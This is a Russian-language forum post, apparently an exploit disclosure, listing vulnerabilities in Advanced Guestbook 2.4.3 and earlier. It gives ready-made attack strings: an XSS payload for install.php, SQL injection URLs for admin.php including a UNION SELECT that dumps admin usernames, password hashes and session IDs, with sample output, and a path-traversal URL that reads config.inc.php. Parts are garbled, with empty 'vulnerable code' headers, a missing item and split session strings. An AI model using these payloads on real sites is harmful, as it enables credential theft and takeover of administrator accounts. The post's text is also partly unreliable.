![]() |
Advanced Guestbook <=2.4.3 уязвимости (малозначимые)
1) Дефолтный аккаунт администратора:
Цитата:
Warning: mysql_connect(): Access denied for user 'ODBC'@'localhost' (using password: NO) in Q:\home\localhost\www\agb\install.php on line 258 Cannot connect to database Также в скрипте misc/forget_pass.php. 3) XSS в скрипте install.php: POST: ...&host=localhost"><h1>Here_I_am.... 4) SQL инъекция в скрипте admin.php (magic_quotes=Off): admin.php?action=smilies&session=ef7658b27e55dc226 4d2ee175a546f5c&uid=1&del_smilie=1' Уязвимый код: PHP код:
Уязвимый код: PHP код:
admin.php?action=smilies&session=ef7658b27e55dc226 4d2ee175a546f5c&uid=1&edit_smilie=1'+and+(1=0) +union+select+1,2,concat(username,':',password,':' ,session),4,5,6+from+book_auth/* admin:29bad1457ee5e49e:ea3d671d4778a037b0fb42ef738 fc521 Уязвимый код: PHP код:
5) Чтение произвольных (практически ;-)) файлов (бага старая, перекочевала из предыдущих версий): Пример использования: admin.php?action=template&tpl_name=../admin/config.inc.php&session=e17acac372b1cd1c197b838f234 6d6c0&uid=1 P. S. сессии администратора существуют в течение получаса. |
| Время: 04:16 |